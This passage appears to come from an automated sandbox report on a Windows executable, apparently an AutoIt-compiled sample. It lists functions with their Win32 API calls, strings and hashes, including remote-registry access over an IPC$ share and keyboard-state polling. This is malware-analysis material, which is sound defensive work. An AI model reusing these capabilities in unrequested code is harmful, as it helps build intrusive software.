GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00265664
GetMenuItemCount.USER32(002E1708), ref: 002656ED
DeleteMenu.USER32(002E1708,00000005,00000000,000000F5,?,?), ref: 0026577D
DeleteMenu.USER32(002E1708,00000004,00000000), ref: 00265785
DeleteMenu.USER32(002E1708,00000006,00000000), ref: 0026578D
DeleteMenu.USER32(002E1708,00000003,00000000), ref: 00265795
GetMenuItemCount.USER32(002E1708), ref: 0026579D
SetMenuItemInfoW.USER32(002E1708,00000004,00000000,00000030), ref: 002657D3
GetCursorPos.USER32(?), ref: 002657DD
SetForegroundWindow.USER32(00000000), ref: 002657E6
TrackPopupMenuEx.USER32(002E1708,00000000,?,00000000,00000000,00000000), ref: 002657F9
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00265805

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 77cae48b053a81c3b7842deb3c8196c077c81a11087415c00fabd231219efd43
Instruction ID: a419cf9e6df3a6d93f6fd737544047af198623d0b8db65968efa07a19bd2340a
Opcode Fuzzy Hash: 77cae48b053a81c3b7842deb3c8196c077c81a11087415c00fabd231219efd43
Instruction Fuzzy Hash: 8D710470660A26BFEB219F54DC89FAABF69FF01364F640205F6156A1D0C7B06CB0CB90

Function 0025A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0025A1DC
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0025A211
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0025A22D
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0025A249
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0025A273
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0025A29B
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0025A2A6
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0025A2AB

Strings

\IPC$, xrefs: 0025A1F3
\CLSID, xrefs: 0025A193
SOFTWARE\Classes\, xrefs: 0025A17D

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1687751970-22481851
Opcode ID: 8c45314671ed9e78d5ac71fe7c370a4b86b65e4d8cb9e131f942f4f9e7961c6b
Instruction ID: 1ee9db5f7e02ed390641c0c73f95675846e52418fbda89624e1422de0b01507f
Opcode Fuzzy Hash: 8c45314671ed9e78d5ac71fe7c370a4b86b65e4d8cb9e131f942f4f9e7961c6b
Instruction Fuzzy Hash: BC41E976C20229AFDB11EFE4EC86DEDB778BF14700F404129E906A7161DA749D29CF50

Function 002667E9 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 002667FD
__swprintf.LIBCMT ref: 0026680A

Part of subcall function 0024172B: __woutput_l.LIBCMT ref: 00241784

FindResourceW.KERNEL32(?,?,0000000E), ref: 00266834
LoadResource.KERNEL32(?,00000000), ref: 00266840
LockResource.KERNEL32(00000000), ref: 0026684D
FindResourceW.KERNEL32(?,?,00000003), ref: 0026686D
LoadResource.KERNEL32(?,00000000), ref: 0026687F
SizeofResource.KERNEL32(?,00000000), ref: 0026688E
LockResource.KERNEL32(?), ref: 0026689A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 002668F9

Strings

5-, xrefs: 002667F6

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID: 5-
API String ID: 1433390588-64948831
Opcode ID: 847fcbec10f402378c2bfd79f7c21d5b8ded0c2118a0a2ef00f1fe159f066ea3
Instruction ID: 562fb79aa9324ccf0a128df24a44ceef0e6766415e6f0b579a0e01dc8aa3be91
Opcode Fuzzy Hash: 847fcbec10f402378c2bfd79f7c21d5b8ded0c2118a0a2ef00f1fe159f066ea3
Instruction Fuzzy Hash: 1C318F7191125AABDB109FB1ED8DABABBA8EF09340F004425FD02D7151EB30DDA5DAA0

Function 002625B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,002936F4,00000010,?,Bad directive syntax error,002BDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 002625D6
LoadStringW.USER32(00000000,?,002936F4,00000010), ref: 002625DD
_wprintf.LIBCMT ref: 00262610
__swprintf.LIBCMT ref: 00262632
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 002626A1

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 0026260B
Line %d:, xrefs: 0026262C
., xrefs: 00262687
Line %d (File "%s"):, xrefs: 00262647
Error: , xrefs: 0026266F

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1080873982-4153970271
Opcode ID: d89491270b068358b48928464a174cafb177dfe85293337476f4d2977c08b4c6
Instruction ID: 70cd3cb784c124de04e8b782c8ecd870697a0c54262f2b93a5dee33b66d5c73b
Opcode Fuzzy Hash: d89491270b068358b48928464a174cafb177dfe85293337476f4d2977c08b4c6
Instruction Fuzzy Hash: 9A214B3182022ABFDF15EF90DC4AEEE7B39BF19304F004456F505661A2EA71AA78DF51

Function 00267AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00267B42
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00267B58
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00267B69
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00267B7B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00267B8C

Strings

open , xrefs: 00267AF1
alias PlayMe, xrefs: 00267B1B
play PlayMe, xrefs: 00267B87
status PlayMe mode, xrefs: 00267B3D
close PlayMe, xrefs: 00267B53, 00267B80
play PlayMe wait, xrefs: 00267B76

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: SendString
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 890592661-1007645807
Opcode ID: 8baef637f5a8d18ae118c92e0fd5b23c838373c8551553a6cd340ed6e8ec14c9
Instruction ID: 36646c274f6333523ac1b5f8a87ae147af7b8f253e9eecc9f6a6990ffb8ba250
Opcode Fuzzy Hash: 8baef637f5a8d18ae118c92e0fd5b23c838373c8551553a6cd340ed6e8ec14c9
Instruction Fuzzy Hash: 2811B2B167026979E720E7A1EC4ADFFBB7CEB92B04F00052A7411A21D1DEA00E64C9B1

Function 0026778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00267794

Part of subcall function 0023DC38: timeGetTime.WINMM(?,7694B400,002958AB), ref: 0023DC3C

Sleep.KERNEL32(0000000A), ref: 002677C0
EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 002677E4
FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00267806
SetActiveWindow.USER32 ref: 00267825
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00267833
SendMessageW.USER32(00000010,00000000,00000000), ref: 00267852
Sleep.KERNEL32(000000FA), ref: 0026785D
IsWindow.USER32 ref: 00267869
EndDialog.USER32(00000000), ref: 0026787A

Strings

BUTTON, xrefs: 002677F8

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 5e2766edddd7d5a41b0ff4c805d7ddb15aa6658cd1ffb848322f30b66c27ea0a
Instruction ID: 5901a1649843a22c0a05066cfac60502b442fe6e2057036a431e019c6d0ec7c9
Opcode Fuzzy Hash: 5e2766edddd7d5a41b0ff4c805d7ddb15aa6658cd1ffb848322f30b66c27ea0a
Instruction Fuzzy Hash: 64215BB0664245AFE7019F20FCCDE263F6AFB0674AF0400A4F506875A2CF718CA0EE60

Function 002702EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON

Download Yara Rule

APIs

Part of subcall function 0022936C: __swprintf.LIBCMT ref: 002293AB
Part of subcall function 0022936C: __itow.LIBCMT ref: 002293DF

CoInitialize.OLE32(00000000), ref: 0027034B
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 002703DE
SHGetDesktopFolder.SHELL32(?), ref: 002703F2
CoCreateInstance.OLE32(002ADA8C,00000000,00000001,002D3CF8,?), ref: 0027043E
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 002704AD
CoTaskMemFree.OLE32(?,?), ref: 00270505
_memset.LIBCMT ref: 00270542
SHBrowseForFolderW.SHELL32(?), ref: 0027057E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 002705A1
CoTaskMemFree.OLE32(00000000), ref: 002705A8
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 002705DF
CoUninitialize.OLE32(00000001,00000000), ref: 002705E1

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 38962bbdba350dae5e3175344cf5d315bbf2cb2eebe2a796414facc84160d9ae
Instruction ID: e60ba0b622b9a0ae09394be84771d7337e2427ba932e75c00a913d9a20db2bc6
Opcode Fuzzy Hash: 38962bbdba350dae5e3175344cf5d315bbf2cb2eebe2a796414facc84160d9ae
Instruction Fuzzy Hash: 9FB1D875A10219EFDB04DFA4D888DAEBBB9FF49304B148499E80AEB251DB30ED55CF50

Function 00262E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00262ED6
SetKeyboardState.USER32(?), ref: 00262F41
GetAsyncKeyState.USER32(000000A0), ref: 00262F61
GetKeyState.USER32(000000A0), ref: 00262F78
GetAsyncKeyState.USER32(000000A1), ref: 00262FA7
GetKeyState.USER32(000000A1), ref: 00262FB8
GetAsyncKeyState.USER32(00000011), ref: 00262FE4
GetKeyState.USER32(00000011), ref: 00262FF2
GetAsyncKeyState.USER32(00000012), ref: 0026301B
GetKeyState.USER32(00000012), ref: 00263029
GetAsyncKeyState.USER32(0000005B), ref: 00263052
GetKeyState.USER32(0000005B), ref: 00263060

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 617537089d5670a8d70e1c51cb600918f81244ba18c4dee93faa7733dc6db021
Instruction ID: 9a6d19c324291949ad9cc159216331f894470e084001d16bece7a9cb51ffccc3
Opcode Fuzzy Hash: 617537089d5670a8d70e1c51cb600918f81244ba18c4dee93faa7733dc6db021
Instruction Fuzzy Hash: 0D510A20A18BC569FB35EFB489107EABFF45F12340F08459DC5C2565C2DA54ABDCCBA2

Function 0025ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0025ED1E
GetWindowRect.USER32(00000000,?), ref: 0025ED30
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0025ED8E
GetDlgItem.USER32(?,00000002), ref: 0025ED99
GetWindowRect.USER32(00000000,?), ref: 0025EDAB
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0025EE01
GetDlgItem.USER32(?,000003E9), ref: 0025EE0F
GetWindowRect.USER32(00000000,?), ref: 0025EE20
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0025EE63
GetDlgItem.USER32(?,000003EA), ref: 0025EE71
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0025EE8E
InvalidateRect.USER32(?,00000000,00000001), ref: 0025EE9B

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: b81c22f229e4dc7713f05d16dcf3308ec7c031e23f31e61e2516ea5f8cb0dbe2
Instruction ID: b5cecdd7fc5445a73b105ef1b7d18b0f49d15513c7b00d21c0df55be28855541
Opcode Fuzzy Hash: b81c22f229e4dc7713f05d16dcf3308ec7c031e23f31e61e2516ea5f8cb0dbe2
Instruction Fuzzy Hash: 8B514671B10205AFDF18CF68DD89AAEBBB9FB89711F158129F916D7290DB709D048B10

Function 0023B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0023B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0023B759,?,00000000,?,?,?,?,0023B72B,00000000,?), ref: 0023BA58

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0023B72B), ref: 0023B7F6
KillTimer.USER32(00000000,?,00000000,?,?,?,?,0023B72B,00000000,?,?,0023B2EF,?,?), ref: 0023B88D
DestroyAcceleratorTable.USER32(00000000), ref: 0029D8A6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0023B72B,00000000,?,?,0023B2EF,?,?), ref: 0029D8D7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0023B72B,00000000,?,?,0023B2EF,?,?), ref: 0029D8EE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0023B72B,00000000,?,?,0023B2EF,?,?), ref: 0029D90A
DeleteObject.GDI32(00000000), ref: 0029D91C

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: b729d50484e44fa0e271c5e1b7fcd797731715d54228e2e63b1d995e32d350b6
Instruction ID: 9b6b66f57fbda700b96fc824823a84169d4d1b15196f9ea76cea8cae876e21b1
Opcode Fuzzy Hash: b729d50484e44fa0e271c5e1b7fcd797731715d54228e2e63b1d995e32d350b6
Instruction Fuzzy Hash: E8619EB1521642DFEB269F18E98CB65B7B9FF95312F14052DE1468AA70CB70A8B0DF40

Function 0023B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON

Download Yara Rule

APIs

Part of subcall function 0023B526: GetWindowLongW.USER32(?,000000EB), ref: 0023B537

GetSysColor.USER32(0000000F), ref: 0023B438

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 9598677ab1966d7fbd92eb4a46fa392d951251d5a5c08dc0f2a03ae53a6eff86
Instruction ID: 3595b188d51f188e56e6e8314392622e5d48b6765575fad02a018007f23c2d58
Opcode Fuzzy Hash: 9598677ab1966d7fbd92eb4a46fa392d951251d5a5c08dc0f2a03ae53a6eff86
Instruction Fuzzy Hash: DA412470110144AFCF265F28EC99BB93B65EB06730F184265FFA68E5E2CB308C51DB21

Function 0026690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 00266923
_wcscpy.LIBCMT ref: 00266934
__wsplitpath.LIBCMT ref: 00266958
__wsplitpath.LIBCMT ref: 00266979
_wcscpy.LIBCMT ref: 0026699B
_wcscpy.LIBCMT ref: 002669B9
_wcscpy.LIBCMT ref: 002669C7
_wcscat.LIBCMT ref: 002669D6
_wcscat.LIBCMT ref: 00266A2B
_wcscat.LIBCMT ref: 00266A61
_wcscat.LIBCMT ref: 00266A73

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
String ID:
API String ID: 136442275-0
Opcode ID: c64fb7d0ebcde2dd03bfe3ba10286a6d3f31684beeacd5446700c7d4766e4e39
Instruction ID: afe64f7a8004f535df55641529c9234b2113c23510f85dde87ce4ccdd089d616
Opcode Fuzzy Hash: c64fb7d0ebcde2dd03bfe3ba10286a6d3f31684beeacd5446700c7d4766e4e39
Instruction Fuzzy Hash: 8C411EB685511CAECF65EB94CC85DDF73BCEB48300F0041E6BA59A2051EA70ABF98F50

Function 0026D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(002BDC00,002BDC00,002BDC00), ref: 0026D7CE
GetDriveTypeW.KERNEL32(?,002D3A70,00000061), ref: 0026D898
_wcscpy.LIBCMT ref: 0026D8C2

Strings

removable, xrefs: 0026D800
fixed, xrefs: 0026D816
cdrom, xrefs: 0026D7EA
network, xrefs: 0026D82C
unknown, xrefs: 0026D859
ramdisk, xrefs: 0026D842
all, xrefs: 0026D7D4

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: b4b97ad78072e995626e533a4263154a68475f7cc63238b9ccb1ad0028204a3e
Instruction ID: 0cc57efbb34ecfa29b32388f624df102c41c2f6b10d8f44093bd20fd1b1daf83
Opcode Fuzzy Hash: b4b97ad78072e995626e533a4263154a68475f7cc63238b9ccb1ad0028204a3e
Instruction Fuzzy Hash: FF51E471634305AFC700EF14D891AAEB7A5EF84714F20882EF49A572A2DB71DD69CF42

Function 0022936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 002293AB
__itow.LIBCMT ref: 002293DF

Part of subcall function 00241557: _xtow@16.LIBCMT ref: 00241578

Strings

False, xrefs: 00294C93
%.15g, xrefs: 002293A5
0x%p, xrefs: 00294CAD
True, xrefs: 00294C8C

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: __itow__swprintf_xtow@16
String ID: %.15g$0x%p$False$True
API String ID: 1502193981-2263619337
Opcode ID: da5ef4bcafbf615f6e1cc040309089b07f7410ecbbd0b84f0a5eda256c5edd98
Instruction ID: 3a063950dfc296c1c0d518c80e1c16072b408d8b50829c5052fc9d0e3226214d
Opcode Fuzzy Hash: da5ef4bcafbf615f6e1cc040309089b07f7410ecbbd0b84f0a5eda256c5edd98
Instruction Fuzzy Hash: 6341E571934215EFDB28EF74E941E6A73E8EF48300F2044AFE149D7281EA7199A2CB11

Function 0028A1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0028A259
CreateCompatibleDC.GDI32(00000000), ref: 0028A260
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0028A273
SelectObject.GDI32(00000000,00000000), ref: 0028A27B
GetPixel.GDI32(00000000,00000000,00000000), ref: 0028A286
DeleteDC.GDI32(00000000), ref: 0028A28F
GetWindowLongW.USER32(?,000000EC), ref: 0028A299
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0028A2AD
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0028A2B9

Strings

static, xrefs: 0028A1F1

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

